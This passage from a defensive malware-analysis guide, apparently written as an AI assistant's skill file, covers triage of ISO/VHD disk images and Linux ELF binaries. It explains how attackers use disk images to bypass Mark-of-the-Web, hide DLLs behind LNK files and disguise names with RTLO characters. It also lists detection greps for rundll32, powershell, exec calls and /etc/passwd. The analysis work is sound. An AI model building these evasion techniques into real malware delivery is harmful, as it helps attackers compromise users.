- [ ] Download URLs identified (XMLHTTP, WinHttp, URLDownloadToFile)
- [ ] Encoded payloads (base64, Chr(), HTML entities) decoded
- [ ] innerHTML / injected DOM payload sources checked
- [ ] Dropped file paths documented
- [ ] IOCs extracted and defanged
---
## Disk Image Analysis (ISO / IMG / VHD / VHDX)
### Why Malware Uses Disk Images
Disk images are a widely used MOTW (Mark-of-the-Web) bypass technique on Windows 10 and 11. When a file is downloaded from the internet, Windows attaches a `Zone.Identifier` alternate data stream (`ZoneId=3`, the Internet zone) to flag it as untrusted. On systems without Microsoft's November 2022 fix (CVE-2022-41091), files inside a mounted disk image do **not** inherit the image's MOTW, so payloads inside an ISO/VHD execute without SmartScreen prompts or Protected View restrictions.
Additionally, `.iso` files auto-mount as a virtual DVD drive on double-click in Windows 10+, and `.vhd`/`.vhdx` files auto-mount as a virtual disk — making the delivery seamless for the victim.
**MITRE ATT&CK: T1553.005 — Subvert Trust Controls: Mark-of-the-Web Bypass**
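
The `Zone.Identifier` stream is INI-formatted text, so its zone can be read with a few lines of code once the stream content has been captured (for example with `Get-Content -Stream Zone.Identifier` on the analysis VM). This is a sketch; `parse_zone_id` is a hypothetical helper name.

```python
import configparser
from typing import Optional


def parse_zone_id(stream_text: str) -> Optional[int]:
    """Return the ZoneId from Zone.Identifier stream text, or None if absent."""
    # Interpolation is disabled because HostUrl values often contain '%'.
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case as written (ZoneId, HostUrl)
    parser.read_string(stream_text)
    if parser.has_option("ZoneTransfer", "ZoneId"):
        return parser.getint("ZoneTransfer", "ZoneId")
    return None
```

A container that carries `ZoneId=3` while its extracted payload has no stream at all is the evidence to record for the MOTW bypass.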
### Detection
```bash
file suspicious.iso
# "ISO 9660 CD-ROM filesystem data"
file suspicious.img
# "DOS/MBR boot sector" or "Linux rev 1.0 ext2 filesystem data"
file suspicious.vhd
# "Microsoft Disk Image, Virtual Server or Virtual PC, version 0x00010000"
file suspicious.vhdx
# "Microsoft Disk Image eXtended"
```
### Analysis Approach
Always analyze disk images **read-only** and **without executing** any contained files outside an isolated VM.
**Option A: Extract Without Mounting (Safest — 7-Zip)**
Works on Linux, Windows, and macOS. No kernel interaction required.
```bash
# List contents first
7z l suspicious.iso
# Extract to isolated directory
mkdir /tmp/iso_contents
7z x suspicious.iso -o/tmp/iso_contents/
# Identify all extracted files
file /tmp/iso_contents/*
find /tmp/iso_contents/ -type f -exec file {} +
```
**Option B: Mount Read-Only (Linux)**
```bash
# ISO / IMG
sudo mkdir /mnt/suspicious_iso
sudo mount -o loop,ro suspicious.iso /mnt/suspicious_iso
# List all files including hidden
ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -type f
# Identify file types
find /mnt/suspicious_iso/ -type f -exec file {} \;
# Copy files out for analysis (do not execute in place)
cp -r /mnt/suspicious_iso/ /tmp/iso_extracted/
# Unmount when done
sudo umount /mnt/suspicious_iso
```
**Option C: Mount Read-Only (Windows — analysis VM only)**
```powershell
# Mount as read-only virtual drive
$img = Mount-DiskImage -ImagePath "C:\analysis\suspicious.iso" -Access ReadOnly -PassThru
$driveLetter = ($img | Get-Volume).DriveLetter
# List all files including hidden
Get-ChildItem "${driveLetter}:\" -Recurse -Force | Select FullName, Attributes, Length
# Copy contents for analysis
Copy-Item "${driveLetter}:\*" "C:\analysis\extracted\" -Recurse -Force
# Dismount
Dismount-DiskImage -ImagePath "C:\analysis\suspicious.iso"
```
**VHD/VHDX on Linux:**
```bash
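# Install qemu tools if needed
sudo apt install qemu-utils
# Convert VHD to raw for mounting (use -f vhdx for .vhdx files)
qemu-img convert -f vpc -O raw suspicious.vhd suspicious_raw.img
# Images usually carry a partition table, so map partitions before mounting
sudo mkdir -p /mnt/vhd_mount
loopdev=$(sudo losetup --find --show --partscan --read-only suspicious_raw.img)
sudo mount -o ro "${loopdev}p1" /mnt/vhd_mount/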
```
### What to Look For
**1. LNK + Hidden DLL/EXE (Most Common Pattern)**
The canonical ISO malware delivery pattern:
```
archive.iso/
  Invoice.lnk   <- Victim double-clicks this
  document.pdf  <- Decoy shown to victim
  payload.dll   <- Hidden (file attribute set); executed by LNK via rundll32
```
```bash
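# Find hidden files (Linux mount)
# Note: the Windows Hidden attribute is not a dot-prefix, so -name ".*" only finds Unix-style dot-files;
# compare the full recursive listing against what Explorer would show by default
find /mnt/suspicious_iso/ -name ".*"
ls -laR /mnt/suspicious_iso/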
# Analyze LNK files
lnkinfo Invoice.lnk # Linux
strings Invoice.lnk | grep -E "\.exe|\.dll|rundll32|cmd|powershell"
```
**2. Decoy Documents**
Disk images frequently contain a visible, benign-looking document (PDF, DOCX) displayed to the victim while the payload runs in the background. Flag any document files and analyze them separately using the appropriate section of this skill.
**3. File Naming Tricks**
```bash
# Check for double extensions and right-to-left override (RTLO) tricks
ls -la /mnt/suspicious_iso/
# e.g. U+202E (RTLO) in "invoice<U+202E>cod.exe" makes the name display as "invoiceexe.doc"
# Detect non-ASCII bytes in filenames
find /mnt/suspicious_iso/ -print | LC_ALL=C grep -P '[^\x00-\x7F]'
```
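Bidirectional control characters are invisible in most listings, so it is worth checking filenames for them explicitly. The set below is a reasonable but not exhaustive selection, and `suspicious_name_chars` is a hypothetical helper name.

```python
# Unicode bidirectional control characters that can reorder displayed text.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # embeddings / overrides
    "\u2066", "\u2067", "\u2068", "\u2069",            # isolates
    "\u200e", "\u200f",                                # LRM / RLM marks
}


def suspicious_name_chars(name: str) -> list[str]:
    """Return the code points of any bidi control characters in a filename."""
    return [f"U+{ord(ch):04X}" for ch in name if ch in BIDI_CONTROLS]
```

Feed it the names from `os.listdir()` or from an archive listing; any non-empty result means the displayed name and the real extension may differ.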
**4. Autorun Configuration**
```bash
# Check for autorun.inf (older technique, still seen in IMG files)
cat /mnt/suspicious_iso/autorun.inf 2>/dev/null
```
### Contained File Routing
Once files are extracted, route each to the appropriate analysis path:
| Extracted File Type | Next Step |
|---------------------|-----------|
| `.lnk` | LNK Analysis section (this skill) |
| `.dll` / `.exe` (PE) | malware-triage then malware-dynamic-analysis |
| `.ps1` / `.vbs` / `.js` | Script Analysis section (this skill) |
| `.docm` / `.xlsm` | Office Macro Analysis section (this skill) |
| `.hta` | HTA Analysis section (this skill) |
| Nested `.zip` / `.iso` | Repeat disk image / archive analysis |
### Analysis Checklist - Disk Images
- [ ] File type confirmed (`file` command)
- [ ] Contents listed before extraction
- [ ] Extracted to isolated directory (read-only mount or 7-Zip)
- [ ] All files identified with `file` command (do not trust extensions)
- [ ] Hidden files checked (`-a` flag / `Get-ChildItem -Force`)
- [ ] LNK files analyzed — target, arguments, working directory documented
- [ ] Decoy documents identified
- [ ] RTLO / double-extension filename tricks checked
- [ ] autorun.inf inspected (if present)
- [ ] Payload files routed to appropriate analysis skill
- [ ] MOTW bypass technique documented in report
---
## Linux / ELF Binary Analysis
### Detection
```bash
file sample.bin
# Output: "ELF 64-bit LSB executable, x86-64"
```
### Static Analysis
**ELF Header:**
```bash
readelf -h sample.bin
# Shows:
# - Architecture (x86, x86-64, ARM)
# - Entry point address
# - Program header offset
# - Section header offset
```
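The same header fields can be read directly when `readelf` is unavailable or when triaging many samples. This sketch decodes only the fields listed above; `parse_elf_header` and the short `MACHINES` table are assumptions of this example.

```python
import struct

# Small subset of e_machine values; unknown values are returned as hex.
MACHINES = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}


def parse_elf_header(data: bytes) -> dict:
    """Decode class, machine, type, and entry point from an ELF header."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64 = data[4] == 2                    # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if data[5] == 1 else ">"   # EI_DATA: 1 = little-endian
    # e_type and e_machine are 16-bit fields at offset 16; e_entry follows
    # the 32-bit e_version and therefore starts at offset 24.
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    (entry,) = struct.unpack_from(endian + ("Q" if is_64 else "I"), data, 24)
    return {
        "bits": 64 if is_64 else 32,
        "machine": MACHINES.get(e_machine, hex(e_machine)),
        "type": e_type,
        "entry": entry,
    }
```

Only the first 32 bytes of the file are needed, so this never has to load or execute the sample.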
**Sections:**
```bash
readelf -S sample.bin
# Look for suspicious sections:
# - High entropy sections (encrypted/packed)
# - Unusual section names
# - RWX sections (read-write-execute)
```
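`readelf` does not report entropy itself, so it has to be computed from the section bytes. A minimal Shannon entropy function is sketched below; `shannon_entropy` is a hypothetical helper, and any cut-off for "high" is a rule of thumb rather than a fixed threshold.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(data).values())
```

Values close to 8 bits per byte suggest compressed or encrypted content; plain code and text usually score noticeably lower.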
**Imported Libraries:**
```bash
# ldd can execute code from the sample, so read the dynamic section instead
readelf -d sample.bin | grep NEEDED
# Look for:
# - libssl.so (crypto/network)
# - libc.so (standard)
# - Unusual paths (/tmp/lib.so)
```
**Imported Symbols:**
```bash
nm -D sample.bin
objdump -T sample.bin
# Search for suspicious functions:
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
```
**Strings:**
```bash
strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
```
### Dynamic Analysis (Linux)
**strace - System Call Monitoring:**
```bash
# Monitor all system calls (this executes the sample; isolated analysis VM only)
strace -f ./sample.bin 2>&1 | tee strace_output.txt
# Monitor specific calls
strace -e trace=network,file,process ./sample.bin
# File operations only
strace -e trace=open,openat,read,write,close ./sample.bin
# Network operations only
strace -e trace=socket,connect,sendto,recvfrom ./sample.bin
```
**ltrace - Library Call Monitoring:**
```bash
ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt
```
**Check for Packing:**
```bash
# UPX detection (packed ELF files often lack section headers, so search for the UPX! marker)
strings -a sample.bin | grep "UPX!"
# Unpack UPX
upx -d sample.bin -o sample_unpacked.bin
```
### Analysis Checklist - ELF
- [ ] Architecture identified (x86/x64/ARM)
- [ ] Imported libraries documented
- [ ] Suspicious functions identified
- [ ] Packing detected and removed (if UPX)
- [ ] Strings extracted and analyzed
- [ ] System calls monitored (strace)
- [ ] Network activity captured
- [ ] File operations documented
---
## Integration with Report Writing
Each file type contributes specific sections to the malware analysis report:
**.NET Analysis** →
- Decompiled code snippets
- Embedded resource descriptions
- Obfuscation techniques used
- Reflective loading mechanisms
**Office Macros** →
- Macro code (sanitized)
- Auto-execution methods
- Download URLs
- Payload dropping process
**PDF Analysis** →
- Embedded JavaScript
- Auto-action triggers
- Exploit CVEs (if applicable)
- Shellcode presence
**Scripts** →
- Deobfuscated code
- Execution flow
- Download cradles
- C2 communications
**Archives/LNK** →
- Archive structure
- Masquerading techniques
- LNK target analysis
- Social engineering aspects
**HTA Files** →
- Extracted VBScript/JScript
- ActiveX objects abused
- Download cradle URLs
- PowerShell invocation chains
**Disk Images (ISO/VHD)** →
- Container structure and hidden files
- MOTW bypass technique documented
- LNK target and payload relationship
- Decoy document identified
**ELF Binaries** →
- System calls used
- Network protocols
- Persistence mechanisms (cron, systemd)
- Rootkit indicators
---
## Tool Quick Reference
| File Type | Primary Tool | Secondary Tool |
|-----------|--------------|----------------|
| **.NET** | dnSpy | ILSpy, de4dot |
| **Office Macros** | oledump.py | olevba, XLMMacroDeobfuscator |
| **PDF** | pdfid.py, pdf-parser.py | peepdf |
| **PowerShell** | PSDecode | Manual analysis |
| **VBScript/JS** | Text editor + analysis | js-beautify |
| **HTA** | Text editor + grep | CyberChef (decode), Process Monitor (dynamic) |
| **ISO/IMG/VHD/VHDX** | 7-Zip (extract), mount -o ro (Linux) | Mount-DiskImage (Windows), qemu-utils (VHD) |
| **Archives** | 7z, unzip, tar | - |
| **LNK** | LECmd (Win), lnkinfo (Linux) | strings |
| **ELF** | readelf, nm, objdump | strace, ltrace |
---
## Best Practices
**Do:**
- Always identify file type first (`file` command)
- Extract in isolated environments
- Document obfuscation techniques
- Save original and deobfuscated versions
- Test extracted IOCs for accuracy
- Cross-reference with VirusTotal/MalwareBazaar
**Don't:**
- Execute scripts without understanding them first
- Trust file extensions (check magic bytes)
- Skip deobfuscation steps
- Extract archives directly to important directories
- Assume password-protected = safe
---
## Example Usage
**User request:** "I have a suspicious .docm file with macros, help me analyze it"
**Workflow:**
1. Confirm file type (Office document)
2. Use oledump.py to list streams
3. Extract VBA macro code
4. Identify auto-execution functions
5. Decode obfuscated strings
6. Extract download URLs and IOCs
7. Document payload delivery method
8. Prepare findings for report